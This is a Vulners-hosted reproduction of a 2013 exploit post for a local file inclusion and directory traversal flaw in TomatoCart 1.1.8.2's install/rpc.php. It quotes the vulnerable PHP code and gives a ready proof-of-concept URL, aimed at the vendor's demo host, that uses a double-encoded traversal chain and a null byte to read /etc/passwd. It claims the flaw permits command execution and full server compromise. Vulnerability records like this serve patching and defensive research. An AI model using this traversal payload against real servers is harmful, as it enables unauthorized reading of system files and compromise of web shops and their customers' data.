Vulners
Lucene search
TomatoCart 1.1.8.2 LFI / Directory Traversal Vulnerabilities
###########################################################################################
#Exploit Title: TomatoCart 1.1.8.2 - LFI / Directory Traversal Vulnerability
#Product: TomatoCart
#Official site: http://www.tomatocart.com/
#Demo : http://demo.tomatocart.com/
#Risk Level: High
#Exploit Author: Esac
#Last Checked: 18/11/2013
###########################################################################################
+----------+
| OVERVIEW |
+----------+
TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services.
unfortunatly , Tomatocart suffer from critical vuln that allow attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server
+-----------------------------------------------------------------------------------+
+-------------------------------------+
| LFI / Directory Traversal Vuln |
+-------------------------------------+
Affected file : install/rpc.php
.......................................................
if (isset($_GET['action']) && !empty($_GET['action'])) {
switch ($_GET['action']) {
case 'dbCheck':
$db = array('DB_SERVER' => trim(urldecode($_GET['server'])),
'DB_SERVER_USERNAME' => trim(urldecode($_GET['username'])),
'DB_SERVER_PASSWORD' => trim(urldecode($_GET['password'])),
'DB_DATABASE' => trim(urldecode($_GET['name'])),
'DB_DATABASE_CLASS' => trim(urldecode($_GET['class']))
);
$osC_Database = osC_Database::connect($db['DB_SERVER'], $db['DB_SERVER_USERNAME'], $db['DB_SERVER_PASSWORD'], $db['DB_DATABASE_CLASS']);
if ($osC_Database->isError() === false) {
$osC_Database->selectDatabase($db['DB_DATABASE']);
}
if ($osC_Database->isError()) {
echo '[[0|' . $osC_Database->getError() . ']]';
} else {
echo '[[1]]';
}
exit;
break;
.........................................................
+------------------+
| PROOF OF CONCEPT |
+------------------+
http://demo.tomatocart.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
+--------------------------------------------------------------+
Knowledge is not an object , it's a flaw :)
Email : [email protected] & [email protected]
Greetz : White Tarbouch TEAM - Cobra
www.Iss4m.ma && www.eternalsec.com/cc
./Issam IEBOUBEN Aka Esac
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Nov 2013 00:00Current
6.9Medium risk
Vulners AI Score6.9